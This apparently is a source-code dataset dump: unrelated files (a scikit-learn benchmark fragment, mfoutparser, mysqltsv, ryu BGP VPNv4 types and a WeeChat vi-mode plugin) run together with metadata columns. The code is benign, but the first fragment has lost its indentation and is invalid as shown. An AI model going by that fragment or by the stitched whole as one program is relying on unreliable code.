ratio = n_samples / opts.n_population
print('Benchmarks')
print("===========================")
for name in sorted(sampling_algorithm):
print("Perform benchmarks for %s..." % name, end="")
time[name] = np.zeros(shape=(opts.n_steps, opts.n_times))
for step in xrange(opts.n_steps):
for it in xrange(opts.n_times):
time[name][step, it] = bench_sample(sampling_algorithm[name],
opts.n_population,
n_samples[step])
print("done")
print("Averaging results...", end="")
for name in sampling_algorithm:
time[name] = np.mean(time[name], axis=1)
print("done\n")
# Print results
###########################################################################
print("Script arguments")
print("===========================")
arguments = vars(opts)
print("%s \t | %s " % ("Arguments".ljust(16),
"Value".center(12),))
print(25 * "-" + ("|" + "-" * 14) * 1)
for key, value in arguments.items():
print("%s \t | %s " % (str(key).ljust(16),
str(value).strip().center(12)))
print("")
print("Sampling algorithm performance:")
print("===============================")
print("Results are averaged over %s repetition(s)." % opts.n_times)
print("")
fig = plt.figure('scikit-learn sample w/o replacement benchmark results')
plt.title("n_population = %s, n_times = %s" %
(opts.n_population, opts.n_times))
ax = fig.add_subplot(111)
for name in sampling_algorithm:
ax.plot(ratio, time[name], label=name)
ax.set_xlabel('ratio of n_sample / n_population')
ax.set_ylabel('Time (s)')
ax.legend()
# Sort legend labels
handles, labels = ax.get_legend_handles_labels()
hl = sorted(zip(handles, labels), key=operator.itemgetter(1))
handles2, labels2 = zip(*hl)
ax.legend(handles2, labels2, loc=0)
plt.show()
| bsd-3-clause | 8,383,169,419,905,794,000 | 37.68599 | 80 | 0.476523 | false | 4.906863 | false | false | false |
mlgill/mfoutparser | mfoutparser/examples.py | 1 | 1339 | import os
from sys import modules
from shutil import copytree
def copy_examples(dest_path='.'):
"""Copy mfoutparser example files to a specified directory.
Input: destination path for mfoutparser example files,
default directory is the current path.
If the destination directory exists and is not
empty, then a directory called "examples" will
be created for the files inside the destination
directory.
Output: directory with example files
"""
# Setup examples path
mfoutpath = modules['mfoutparser'].__path__[0]
examplespath = os.sep.join([mfoutpath, 'examples'])
# Setup destination path
if dest_path is '.':
dest_path = os.getcwd()
elif dest_path[0] is not os.sep:
dest_path = os.sep.join([os.getcwd(), dest_path])
destination = dest_path
# Create a new destination directory if current one is not empty
if os.path.exists(destination):
if os.listdir(destination) != []:
destination = os.sep.join([destination, 'examples'])
# Copy files
try:
copytree(examplespath, destination)
except:
print('Files could not be copied to {:s}'.format(destination))
else:
print('Example files copied to {:s}'.format(destination))
return | bsd-3-clause | -8,326,535,327,619,962,000 | 30.162791 | 70 | 0.637043 | false | 4.478261 | false | false | false |
halfak/mysqltsv | mysqltsv/writer.py | 1 | 1278 | """
This module provides a set of utilities for writing TSV files.
.. autoclass:: mysqltsv.writer.Writer
:members:
.. autofunction:: mysqltsv.functions.write
"""
import logging
from .util import write_row
logger = logging.getLogger(__name__)
class Writer:
"""
Constructs a new TSV row writer.
:Parameters:
f : `file`
A file pointer to write rows to
headers : `list`(`str`)
If a list of `str` is provided, use those strings as headers.
Otherwise, no headers are written.
none_string : `str`
A string that will be written as None when read. (Defaults to
"NULL")
"""
def __init__(self, f, headers=None, none_string="NULL"):
self.f = f
self.none_string = none_string
if headers != None:
write_row(headers, self.f, none_string=self.none_string)
self.headers = headers
def write(self, row):
"""
Writes a row to the output file.
:Parameters:
row : `list` | `dict` | :class:`~mysqltsv.row_type.AbstractRow`
Datastructure representing the row to write
"""
write_row(row, self.f, headers=self.headers,
none_string=self.none_string)
| mit | 2,299,175,198,851,908,400 | 24.56 | 75 | 0.580595 | false | 3.968944 | false | false | false |
takahashiminoru/ryu | ryu/services/protocols/bgp/info_base/vpnv4.py | 52 | 1825 | # Copyright (C) 2014 Nippon Telegraph and Telephone Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Defines data types and models required specifically for VPNv4 support.
"""
import logging
from ryu.lib.packet.bgp import IPAddrPrefix
from ryu.lib.packet.bgp import RF_IPv4_VPN
from ryu.services.protocols.bgp.info_base.vpn import VpnDest
from ryu.services.protocols.bgp.info_base.vpn import VpnPath
from ryu.services.protocols.bgp.info_base.vpn import VpnTable
LOG = logging.getLogger('bgpspeaker.info_base.vpnv4')
class Vpnv4Dest(VpnDest):
"""VPNv4 Destination
Store IPv4 Paths.
"""
ROUTE_FAMILY = RF_IPv4_VPN
class Vpnv4Table(VpnTable):
"""Global table to store VPNv4 routing information.
Uses `Vpnv4Dest` to store destination information for each known vpnv4
paths.
"""
ROUTE_FAMILY = RF_IPv4_VPN
VPN_DEST_CLASS = Vpnv4Dest
class Vpnv4Path(VpnPath):
"""Represents a way of reaching an VPNv4 destination."""
ROUTE_FAMILY = RF_IPv4_VPN
VRF_PATH_CLASS = None # defined in init - anti cyclic import hack
NLRI_CLASS = IPAddrPrefix
def __init__(self, *args, **kwargs):
super(Vpnv4Path, self).__init__(*args, **kwargs)
from ryu.services.protocols.bgp.info_base.vrf4 import Vrf4Path
self.VRF_PATH_CLASS = Vrf4Path
| apache-2.0 | 8,415,084,465,292,393,000 | 29.932203 | 74 | 0.729315 | false | 3.360958 | false | false | false |
metakirby5/dotfiles | base/.weechat/python/vimode.py | 5 | 50659 | # -*- coding: utf-8 -*-
#
# Copyright (C) 2013-2014 Germain Z. <[email protected]>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
#
# Add vi/vim-like modes to WeeChat.
#
import csv
import os
import re
import subprocess
from StringIO import StringIO
import time
import weechat
# Script info.
# ============
SCRIPT_NAME = "vimode"
SCRIPT_AUTHOR = "GermainZ <[email protected]>"
SCRIPT_VERSION = "0.5"
SCRIPT_LICENSE = "GPL3"
SCRIPT_DESC = ("Add vi/vim-like modes and keybindings to WeeChat.")
# Global variables.
# =================
# General.
# --------
# Halp! Halp! Halp!
GITHUB_BASE = "https://github.com/GermainZ/weechat-vimode/blob/master/"
README_URL = GITHUB_BASE + "README.md"
FAQ_KEYBINDINGS = GITHUB_BASE + "FAQ#problematic-key-bindings.md"
FAQ_ESC = GITHUB_BASE + "FAQ.md#esc-key-not-being-detected-instantly"
# Holds the text of the command-line mode (currently only Ex commands ":").
cmd_text = ""
# Mode we're in. One of INSERT, NORMAL or REPLACE.
mode = "INSERT"
# Holds normal commands (e.g. "dd").
vi_buffer = ""
# See `cb_key_combo_default()`.
esc_pressed = 0
# See `cb_key_pressed()`.
last_signal_time = 0
# See `start_catching_keys()` for more info.
catching_keys_data = {'amount': 0}
# Used for ; and , to store the last f/F/t/T motion.
last_search_motion = {'motion': None, 'data': None}
# Script options.
vimode_settings = {'no_warn': ("off", "don't warn about problematic"
"keybindings and tmux/screen")}
# Regex patterns.
# ---------------
WHITESPACE = re.compile(r"\s")
IS_KEYWORD = re.compile(r"[a-zA-Z0-9_@À-ÿ]")
REGEX_MOTION_LOWERCASE_W = re.compile(r"\b\S|(?<=\s)\S")
REGEX_MOTION_UPPERCASE_W = re.compile(r"(?<=\s)\S")
REGEX_MOTION_UPPERCASE_E = re.compile(r"\S(?!\S)")
REGEX_MOTION_UPPERCASE_B = REGEX_MOTION_UPPERCASE_E
REGEX_MOTION_G_UPPERCASE_E = REGEX_MOTION_UPPERCASE_W
REGEX_MOTION_CARRET = re.compile(r"\S")
REGEX_INT = r"[0-9]"
# Regex used to detect problematic keybindings.
# For example: meta-wmeta-s is bound by default to ``/window swap``.
# If the user pressed Esc-w, WeeChat will detect it as meta-w and will not
# send any signal to `cb_key_combo_default()` just yet, since it's the
# beginning of a known key combo.
# Instead, `cb_key_combo_default()` will receive the Esc-ws signal, which
# becomes "ws" after removing the Esc part, and won't know how to handle it.
REGEX_PROBLEMATIC_KEYBINDINGS = re.compile(r"meta-\w(meta|ctrl)")
# Vi commands.
# ------------
# See Also: `cb_exec_cmd()`.
VI_COMMANDS = {'h': "/help",
'qall': "/exit",
'q': "/close",
'w': "/save",
'set': "/set",
'bp': "/buffer -1",
'bn': "/buffer +1",
'bd': "/close",
'b#': "/input jump_last_buffer_displayed",
'b': "/buffer",
'sp': "/window splith",
'vsp': "/window splitv"}
# Vi operators.
# -------------
# Each operator must have a corresponding function, called "operator_X" where
# X is the operator. For example: `operator_c()`.
VI_OPERATORS = ["c", "d", "y"]
# Vi motions.
# -----------
# Vi motions. Each motion must have a corresponding function, called
# "motion_X" where X is the motion (e.g. `motion_w()`).
# See Also: `SPECIAL_CHARS`.
VI_MOTIONS = ["w", "e", "b", "^", "$", "h", "l", "W", "E", "B", "f", "F", "t",
"T", "ge", "gE", "0"]
# Special characters for motions. The corresponding function's name is
# converted before calling. For example, "^" will call `motion_carret` instead
# of `motion_^` (which isn't allowed because of illegal characters).
SPECIAL_CHARS = {'^': "carret",
'$': "dollar"}
# Methods for vi operators, motions and key bindings.
# ===================================================
# Documented base examples:
# -------------------------
def operator_base(buf, input_line, pos1, pos2, overwrite):
"""Operator method example.
Args:
buf (str): pointer to the current WeeChat buffer.
input_line (str): the content of the input line.
pos1 (int): the starting position of the motion.
pos2 (int): the ending position of the motion.
overwrite (bool, optional): whether the character at the cursor's new
position should be overwritten or not (for inclusive motions).
Defaults to False.
Notes:
Should be called "operator_X", where X is the operator, and defined in
`VI_OPERATORS`.
Must perform actions (e.g. modifying the input line) on its own,
using the WeeChat API.
See Also:
For additional examples, see `operator_d()` and
`operator_y()`.
"""
# Get start and end positions.
start = min(pos1, pos2)
end = max(pos1, pos2)
# Print the text the operator should go over.
weechat.prnt("", "Selection: %s" % input_line[start:end])
def motion_base(input_line, cur, count):
"""Motion method example.
Args:
input_line (str): the content of the input line.
cur (int): the position of the cursor.
count (int): the amount of times to multiply or iterate the action.
Returns:
A tuple containing three values:
int: the new position of the cursor.
bool: True if the motion is inclusive, False otherwise.
bool: True if the motion is catching, False otherwise.
See `start_catching_keys()` for more info on catching motions.
Notes:
Should be called "motion_X", where X is the motion, and defined in
`VI_MOTIONS`.
Must not modify the input line directly.
See Also:
For additional examples, see `motion_w()` (normal motion) and
`motion_f()` (catching motion).
"""
# Find (relative to cur) position of next number.
pos = get_pos(input_line, REGEX_INT, cur, True, count)
# Return the new (absolute) cursor position.
# This motion is exclusive, so overwrite is False.
return cur + pos, False
def key_base(buf, input_line, cur, count):
"""Key method example.
Args:
buf (str): pointer to the current WeeChat buffer.
input_line (str): the content of the input line.
cur (int): the position of the cursor.
count (int): the amount of times to multiply or iterate the action.
Notes:
Should be called `key_X`, where X represents the key(s), and defined
in `VI_KEYS`.
Must perform actions on its own (using the WeeChat API).
See Also:
For additional examples, see `key_a()` (normal key) and
`key_r()` (catching key).
"""
# Key was pressed. Go to Insert mode (similar to "i").
set_mode("INSERT")
# Operators:
# ----------
def operator_d(buf, input_line, pos1, pos2, overwrite=False):
"""Delete text from `pos1` to `pos2` from the input line.
If `overwrite` is set to True, the character at the cursor's new position
is removed as well (the motion is inclusive).
See Also:
`operator_base()`.
"""
start = min(pos1, pos2)
end = max(pos1, pos2)
if overwrite:
end += 1
input_line = list(input_line)
del input_line[start:end]
input_line = "".join(input_line)
weechat.buffer_set(buf, "input", input_line)
set_cur(buf, input_line, pos1)
def operator_c(buf, input_line, pos1, pos2, overwrite=False):
"""Delete text from `pos1` to `pos2` from the input and enter Insert mode.
If `overwrite` is set to True, the character at the cursor's new position
is removed as well (the motion is inclusive.)
See Also:
`operator_base()`.
"""
operator_d(buf, input_line, pos1, pos2, overwrite)
set_mode("INSERT")
def operator_y(buf, input_line, pos1, pos2, _):
"""Yank text from `pos1` to `pos2` from the input line.
See Also:
`operator_base()`.
"""
start = min(pos1, pos2)
end = max(pos1, pos2)
proc = subprocess.Popen(["xclip", "-selection", "c"],
stdin=subprocess.PIPE)
proc.communicate(input=input_line[start:end])
# Motions:
# --------
def motion_0(input_line, cur, count):
"""Go to the first character of the line.
See Also;
`motion_base()`.
"""
return 0, False, False
def motion_w(input_line, cur, count):
"""Go `count` words forward and return position.
See Also:
`motion_base()`.
"""
pos = get_pos(input_line, REGEX_MOTION_LOWERCASE_W, cur, True, count)
if pos == -1:
return len(input_line), False, False
return cur + pos, False, False
def motion_W(input_line, cur, count):
"""Go `count` WORDS forward and return position.
See Also:
`motion_base()`.
"""
pos = get_pos(input_line, REGEX_MOTION_UPPERCASE_W, cur, True, count)
if pos == -1:
return len(input_line), False, False
return cur + pos, False, False
def motion_e(input_line, cur, count):
"""Go to the end of `count` words and return position.
See Also:
`motion_base()`.
"""
for _ in range(max(1, count)):
found = False
pos = cur
for pos in range(cur + 1, len(input_line) - 1):
# Whitespace, keep going.
if WHITESPACE.match(input_line[pos]):
pass
# End of sequence made from 'iskeyword' characters only,
# or end of sequence made from non 'iskeyword' characters only.
elif ((IS_KEYWORD.match(input_line[pos]) and
(not IS_KEYWORD.match(input_line[pos + 1]) or
WHITESPACE.match(input_line[pos + 1]))) or
(not IS_KEYWORD.match(input_line[pos]) and
(IS_KEYWORD.match(input_line[pos + 1]) or
WHITESPACE.match(input_line[pos + 1])))):
found = True
cur = pos
break
# We're at the character before the last and we still found nothing.
# Go to the last character.
if not found:
cur = pos + 1
return cur, True, False
def motion_E(input_line, cur, count):
"""Go to the end of `count` WORDS and return cusor position.
See Also:
`motion_base()`.
"""
pos = get_pos(input_line, REGEX_MOTION_UPPERCASE_E, cur, True, count)
if pos == -1:
return len(input_line), False, False
return cur + pos, True, False
def motion_b(input_line, cur, count):
"""Go `count` words backwards and return position.
See Also:
`motion_base()`.
"""
# "b" is just "e" on inverted data (e.g. "olleH" instead of "Hello").
pos_inv = motion_e(input_line[::-1], len(input_line) - cur - 1, count)[0]
pos = len(input_line) - pos_inv - 1
return pos, True, False
def motion_B(input_line, cur, count):
"""Go `count` WORDS backwards and return position.
See Also:
`motion_base()`.
"""
new_cur = len(input_line) - cur
pos = get_pos(input_line[::-1], REGEX_MOTION_UPPERCASE_B, new_cur,
count=count)
if pos == -1:
return 0, False, False
pos = len(input_line) - (pos + new_cur + 1)
return pos, True, False
def motion_ge(input_line, cur, count):
"""Go to end of `count` words backwards and return position.
See Also:
`motion_base()`.
"""
# "ge is just "w" on inverted data (e.g. "olleH" instead of "Hello").
pos_inv = motion_w(input_line[::-1], len(input_line) - cur - 1, count)[0]
pos = len(input_line) - pos_inv - 1
return pos, True, False
def motion_gE(input_line, cur, count):
"""Go to end of `count` WORDS backwards and return position.
See Also:
`motion_base()`.
"""
new_cur = len(input_line) - cur - 1
pos = get_pos(input_line[::-1], REGEX_MOTION_G_UPPERCASE_E, new_cur,
True, count)
if pos == -1:
return 0, False, False
pos = len(input_line) - (pos + new_cur + 1)
return pos, True, False
def motion_h(input_line, cur, count):
"""Go `count` characters to the left and return position.
See Also:
`motion_base()`.
"""
return max(0, cur - max(count, 1)), False, False
def motion_l(input_line, cur, count):
"""Go `count` characters to the right and return position.
See Also:
`motion_base()`.
"""
return cur + max(count, 1), False, False
def motion_carret(input_line, cur, count):
"""Go to first non-blank character of line and return position.
See Also:
`motion_base()`.
"""
pos = get_pos(input_line, REGEX_MOTION_CARRET, 0)
return pos, False, False
def motion_dollar(input_line, cur, count):
"""Go to end of line and return position.
See Also:
`motion_base()`.
"""
pos = len(input_line)
return pos, False, False
def motion_f(input_line, cur, count):
"""Go to `count`'th occurence of character and return position.
See Also:
`motion_base()`.
"""
return start_catching_keys(1, "cb_motion_f", input_line, cur, count)
def cb_motion_f(update_last=True):
"""Callback for `motion_f()`.
Args:
update_last (bool, optional): should `last_search_motion` be updated?
Set to False when calling from `key_semicolon()` or `key_comma()`
so that the last search motion isn't overwritten.
Defaults to True.
See Also:
`start_catching_keys()`.
"""
global last_search_motion
pattern = catching_keys_data['keys']
pos = get_pos(catching_keys_data['input_line'], re.escape(pattern),
catching_keys_data['cur'], True,
catching_keys_data['count'])
catching_keys_data['new_cur'] = max(0, pos) + catching_keys_data['cur']
if update_last:
last_search_motion = {'motion': "f", 'data': pattern}
cb_key_combo_default(None, None, "")
def motion_F(input_line, cur, count):
"""Go to `count`'th occurence of char to the right and return position.
See Also:
`motion_base()`.
"""
return start_catching_keys(1, "cb_motion_F", input_line, cur, count)
def cb_motion_F(update_last=True):
"""Callback for `motion_F()`.
Args:
update_last (bool, optional): should `last_search_motion` be updated?
Set to False when calling from `key_semicolon()` or `key_comma()`
so that the last search motion isn't overwritten.
Defaults to True.
See Also:
`start_catching_keys()`.
"""
global last_search_motion
pattern = catching_keys_data['keys']
cur = len(catching_keys_data['input_line']) - catching_keys_data['cur']
pos = get_pos(catching_keys_data['input_line'][::-1],
re.escape(pattern),
cur,
False,
catching_keys_data['count'])
catching_keys_data['new_cur'] = catching_keys_data['cur'] - max(0, pos + 1)
if update_last:
last_search_motion = {'motion': "F", 'data': pattern}
cb_key_combo_default(None, None, "")
def motion_t(input_line, cur, count):
"""Go to `count`'th occurence of char and return position.
The position returned is the position of the character to the left of char.
See Also:
`motion_base()`.
"""
return start_catching_keys(1, "cb_motion_t", input_line, cur, count)
def cb_motion_t(update_last=True):
"""Callback for `motion_t()`.
Args:
update_last (bool, optional): should `last_search_motion` be updated?
Set to False when calling from `key_semicolon()` or `key_comma()`
so that the last search motion isn't overwritten.
Defaults to True.
See Also:
`start_catching_keys()`.
"""
global last_search_motion
pattern = catching_keys_data['keys']
pos = get_pos(catching_keys_data['input_line'], re.escape(pattern),
catching_keys_data['cur'] + 1,
True, catching_keys_data['count'])
pos += 1
if pos > 0:
catching_keys_data['new_cur'] = pos + catching_keys_data['cur'] - 1
else:
catching_keys_data['new_cur'] = catching_keys_data['cur']
if update_last:
last_search_motion = {'motion': "t", 'data': pattern}
cb_key_combo_default(None, None, "")
def motion_T(input_line, cur, count):
"""Go to `count`'th occurence of char to the left and return position.
The position returned is the position of the character to the right of
char.
See Also:
`motion_base()`.
"""
return start_catching_keys(1, "cb_motion_T", input_line, cur, count)
def cb_motion_T(update_last=True):
"""Callback for `motion_T()`.
Args:
update_last (bool, optional): should `last_search_motion` be updated?
Set to False when calling from `key_semicolon()` or `key_comma()`
so that the last search motion isn't overwritten.
Defaults to True.
See Also:
`start_catching_keys()`.
"""
global last_search_motion
pattern = catching_keys_data['keys']
pos = get_pos(catching_keys_data['input_line'][::-1], re.escape(pattern),
(len(catching_keys_data['input_line']) -
(catching_keys_data['cur'] + 1)) + 1,
True, catching_keys_data['count'])
pos += 1
if pos > 0:
catching_keys_data['new_cur'] = catching_keys_data['cur'] - pos + 1
else:
catching_keys_data['new_cur'] = catching_keys_data['cur']
if update_last:
last_search_motion = {'motion': "T", 'data': pattern}
cb_key_combo_default(None, None, "")
# Keys:
# -----
def key_cc(buf, input_line, cur, count):
"""Delete line and start Insert mode.
See Also:
`key_base()`.
"""
weechat.command("", "/input delete_line")
set_mode("INSERT")
def key_C(buf, input_line, cur, count):
"""Delete from cursor to end of line and start Insert mode.
See Also:
`key_base()`.
"""
weechat.command("", "/input delete_end_of_line")
set_mode("INSERT")
def key_yy(buf, input_line, cur, count):
"""Yank line.
See Also:
`key_base()`.
"""
proc = subprocess.Popen(["xclip", "-selection", "c"],
stdin=subprocess.PIPE)
proc.communicate(input=input_line)
def key_i(buf, input_line, cur, count):
"""Start Insert mode.
See Also:
`key_base()`.
"""
set_mode("INSERT")
def key_a(buf, input_line, cur, count):
"""Move cursor one character to the right and start Insert mode.
See Also:
`key_base()`.
"""
set_cur(buf, input_line, cur + 1, False)
set_mode("INSERT")
def key_A(buf, input_line, cur, count):
"""Move cursor to end of line and start Insert mode.
See Also:
`key_base()`.
"""
set_cur(buf, input_line, len(input_line), False)
set_mode("INSERT")
def key_I(buf, input_line, cur, count):
"""Move cursor to first non-blank character and start Insert mode.
See Also:
`key_base()`.
"""
pos, _, _ = motion_carret(input_line, cur, 0)
set_cur(buf, input_line, pos)
set_mode("INSERT")
def key_G(buf, input_line, cur, count):
"""Scroll to specified line or bottom of buffer.
See Also:
`key_base()`.
"""
if count > 0:
# This is necessary to prevent weird scroll jumps.
weechat.command("", "/window scroll_top")
weechat.command("", "/window scroll %s" % (count - 1))
else:
weechat.command("", "/window scroll_bottom")
def key_r(buf, input_line, cur, count):
"""Replace `count` characters under the cursor.
See Also:
`key_base()`.
"""
start_catching_keys(1, "cb_key_r", input_line, cur, count, buf)
def cb_key_r():
"""Callback for `key_r()`.
See Also:
`start_catching_keys()`.
"""
global catching_keys_data
input_line = list(catching_keys_data['input_line'])
count = max(catching_keys_data['count'], 1)
cur = catching_keys_data['cur']
if cur + count <= len(input_line):
for _ in range(count):
input_line[cur] = catching_keys_data['keys']
cur += 1
input_line = "".join(input_line)
weechat.buffer_set(catching_keys_data['buf'], "input", input_line)
set_cur(catching_keys_data['buf'], input_line, cur - 1)
catching_keys_data = {'amount': 0}
def key_R(buf, input_line, cur, count):
"""Start Replace mode.
See Also:
`key_base()`.
"""
set_mode("REPLACE")
def key_tilda(buf, input_line, cur, count):
"""Switch the case of `count` characters under the cursor.
See Also:
`key_base()`.
"""
input_line = list(input_line)
count = max(1, count)
while count and cur < len(input_line):
input_line[cur] = input_line[cur].swapcase()
count -= 1
cur += 1
input_line = "".join(input_line)
weechat.buffer_set(buf, "input", input_line)
set_cur(buf, input_line, cur)
def key_alt_j(buf, input_line, cur, count):
"""Go to WeeChat buffer.
Called to preserve WeeChat's alt-j buffer switching.
This is only called when alt-j<num> is pressed after pressing Esc, because
\x01\x01j is received in key_combo_default which becomes \x01j after
removing the detected Esc key.
If Esc isn't the last pressed key, \x01j<num> is directly received in
key_combo_default.
"""
start_catching_keys(2, "cb_key_alt_j", input_line, cur, count)
def cb_key_alt_j():
"""Callback for `key_alt_j()`.
See Also:
`start_catching_keys()`.
"""
global catching_keys_data
weechat.command("", "/buffer " + catching_keys_data['keys'])
catching_keys_data = {'amount': 0}
def key_semicolon(buf, input_line, cur, count, swap=False):
"""Repeat last f, t, F, T `count` times.
Args:
swap (bool, optional): if True, the last motion will be repeated in the
opposite direction (e.g. "f" instead of "F"). Defaults to False.
See Also:
`key_base()`.
"""
global catching_keys_data, vi_buffer
catching_keys_data = ({'amount': 0,
'input_line': input_line,
'cur': cur,
'keys': last_search_motion['data'],
'count': count,
'new_cur': 0,
'buf': buf})
# Swap the motion's case if called from key_comma.
if swap:
motion = last_search_motion['motion'].swapcase()
else:
motion = last_search_motion['motion']
func = "cb_motion_%s" % motion
vi_buffer = motion
globals()[func](False)
def key_comma(buf, input_line, cur, count):
"""Repeat last f, t, F, T in opposite direction `count` times.
See Also:
`key_base()`.
"""
key_semicolon(buf, input_line, cur, count, True)
# Vi key bindings.
# ================
# String values will be executed as normal WeeChat commands.
# For functions, see `key_base()` for reference.
VI_KEYS = {'j': "/window scroll_down",
'k': "/window scroll_up",
'G': key_G,
'gg': "/window scroll_top",
'x': "/input delete_next_char",
'X': "/input delete_previous_char",
'dd': "/input delete_line",
'D': "/input delete_end_of_line",
'cc': key_cc,
'C': key_C,
'i': key_i,
'a': key_a,
'A': key_A,
'I': key_I,
'yy': key_yy,
'p': "/input clipboard_paste",
'/': "/input search_text",
'gt': "/buffer +1",
'K': "/buffer +1",
'gT': "/buffer -1",
'J': "/buffer -1",
'r': key_r,
'R': key_R,
'~': key_tilda,
'\x01[[A': "/input history_previous",
'\x01[[B': "/input history_next",
'\x01[[C': "/input move_next_char",
'\x01[[D': "/input move_previous_char",
'\x01[[H': "/input move_beginning_of_line",
'\x01[[F': "/input move_end_of_line",
'\x01[[5~': "/window page_up",
'\x01[[6~': "/window page_down",
'\x01[[3~': "/input delete_next_char",
'\x01[[2~': key_i,
'\x01M': "/input return",
'\x01?': "/input move_previous_char",
' ': "/input move_next_char",
'\x01[j': key_alt_j,
'\x01[1': "/buffer *1",
'\x01[2': "/buffer *2",
'\x01[3': "/buffer *3",
'\x01[4': "/buffer *4",
'\x01[5': "/buffer *5",
'\x01[6': "/buffer *6",
'\x01[7': "/buffer *7",
'\x01[8': "/buffer *8",
'\x01[9': "/buffer *9",
'\x01[0': "/buffer *10",
'\x01^': "/input jump_last_buffer_displayed",
'\x01D': "/window page_down",
'\x01U': "/window page_up",
'\x01Wh': "/window left",
'\x01Wj': "/window down",
'\x01Wk': "/window up",
'\x01Wl': "/window right",
'\x01W=': "/window balance",
'\x01Wx': "/window swap",
'\x01Ws': "/window splith",
'\x01Wv': "/window splitv",
'\x01Wq': "/window merge",
';': key_semicolon,
',': key_comma}
# Add alt-j<number> bindings.
for i in range(10, 99):
VI_KEYS['\x01[j%s' % i] = "/buffer %s" % i
# Key handling.
# =============
def cb_key_pressed(data, signal, signal_data):
"""Detect potential Esc presses.
Alt and Esc are detected as the same key in most terminals. The difference
is that Alt signal is sent just before the other pressed key's signal.
We therefore use a timeout (50ms) to detect whether Alt or Esc was pressed.
"""
global last_signal_time
last_signal_time = time.time()
if signal_data == "\x01[":
# In 50ms, check if any other keys were pressed. If not, it's Esc!
weechat.hook_timer(50, 0, 1, "cb_check_esc",
"{:f}".format(last_signal_time))
return weechat.WEECHAT_RC_OK
def cb_check_esc(data, remaining_calls):
"""Check if the Esc key was pressed and change the mode accordingly."""
global esc_pressed, vi_buffer, cmd_text, catching_keys_data
if last_signal_time == float(data):
esc_pressed += 1
set_mode("NORMAL")
# Cancel any current partial commands.
vi_buffer = ""
cmd_text = ""
weechat.command("", "/bar hide vi_cmd")
catching_keys_data = {'amount': 0}
weechat.bar_item_update("vi_buffer")
return weechat.WEECHAT_RC_OK
def cb_key_combo_default(data, signal, signal_data):
"""Eat and handle key events when in Normal mode, if needed.
The key_combo_default signal is sent when a key combo is pressed. For
example, alt-k will send the "\x01[k" signal.
Esc is handled a bit differently to avoid delays, see `cb_key_pressed()`.
"""
global esc_pressed, vi_buffer, cmd_text
# If Esc was pressed, strip the Esc part from the pressed keys.
# Example: user presses Esc followed by i. This is detected as "\x01[i",
# but we only want to handle "i".
keys = signal_data
if esc_pressed or esc_pressed == -2:
if keys.startswith("\x01[" * esc_pressed):
# Multiples of 3 seem to "cancel" themselves,
# e.g. Esc-Esc-Esc-Alt-j-11 is detected as "\x01[\x01[\x01"
# followed by "\x01[j11" (two different signals).
if signal_data == "\x01[" * 3:
esc_pressed = -1 # `cb_check_esc()` will increment it to 0.
else:
esc_pressed = 0
# This can happen if a valid combination is started but interrupted
# with Esc, such as Ctrl-W→Esc→w which would send two signals:
# "\x01W\x01[" then "\x01W\x01[w".
# In that case, we still need to handle the next signal ("\x01W\x01[w")
# so we use the special value "-2".
else:
esc_pressed = -2
keys = keys.split("\x01[")[-1] # Remove the "Esc" part(s).
# Ctrl-Space.
elif keys == "\x01@":
set_mode("NORMAL")
return weechat.WEECHAT_RC_OK_EAT
# Nothing to do here.
if mode == "INSERT":
return weechat.WEECHAT_RC_OK
# We're in Replace mode — allow "normal" key presses (e.g. "a") and
# overwrite the next character with them, but let the other key presses
# pass normally (e.g. backspace, arrow keys, etc).
if mode == "REPLACE":
if len(keys) == 1:
weechat.command("", "/input delete_next_char")
elif keys == "\x01?":
weechat.command("", "/input move_previous_char")
return weechat.WEECHAT_RC_OK_EAT
return weechat.WEECHAT_RC_OK
# We're catching keys! Only "normal" key presses interest us (e.g. "a"),
# not complex ones (e.g. backspace).
if len(keys) == 1 and catching_keys_data['amount']:
catching_keys_data['keys'] += keys
catching_keys_data['amount'] -= 1
# Done catching keys, execute the callback.
if catching_keys_data['amount'] == 0:
globals()[catching_keys_data['callback']]()
vi_buffer = ""
weechat.bar_item_update("vi_buffer")
return weechat.WEECHAT_RC_OK_EAT
# We're in command-line mode.
if cmd_text:
# Backspace key.
if keys == "\x01?":
# Remove the last character from our command line.
cmd_text = list(cmd_text)
del cmd_text[-1]
cmd_text = "".join(cmd_text)
# Return key.
elif keys == "\x01M":
weechat.hook_timer(1, 0, 1, "cb_exec_cmd", cmd_text)
cmd_text = ""
# Input.
elif len(keys) == 1:
cmd_text += keys
# Update (and maybe hide) the bar item.
weechat.bar_item_update("cmd_text")
if not cmd_text:
weechat.command("", "/bar hide vi_cmd")
return weechat.WEECHAT_RC_OK_EAT
# Enter command mode.
elif keys == ":":
cmd_text += ":"
weechat.command("", "/bar show vi_cmd")
weechat.bar_item_update("cmd_text")
return weechat.WEECHAT_RC_OK_EAT
# Add key to the buffer.
vi_buffer += keys
weechat.bar_item_update("vi_buffer")
if not vi_buffer:
return weechat.WEECHAT_RC_OK
# Check if the keys have a (partial or full) match. If so, also get the
# keys without the count. (These are the actual keys we should handle.)
# After that, `vi_buffer` is only used for display purposes — only
# `vi_keys` is checked for all the handling.
# If no matches are found, the keys buffer is cleared.
matched, vi_keys, count = get_keys_and_count(vi_buffer)
if not matched:
vi_buffer = ""
return weechat.WEECHAT_RC_OK_EAT
buf = weechat.current_buffer()
input_line = weechat.buffer_get_string(buf, "input")
cur = weechat.buffer_get_integer(buf, "input_pos")
# It's a key. If the corresponding value is a string, we assume it's a
# WeeChat command. Otherwise, it's a method we'll call.
if vi_keys in VI_KEYS:
if isinstance(VI_KEYS[vi_keys], str):
for _ in range(max(count, 1)):
# This is to avoid crashing WeeChat on script reloads/unloads,
# because no hooks must still be running when a script is
# reloaded or unloaded.
if VI_KEYS[vi_keys] == "/input return":
return weechat.WEECHAT_RC_OK
weechat.command("", VI_KEYS[vi_keys])
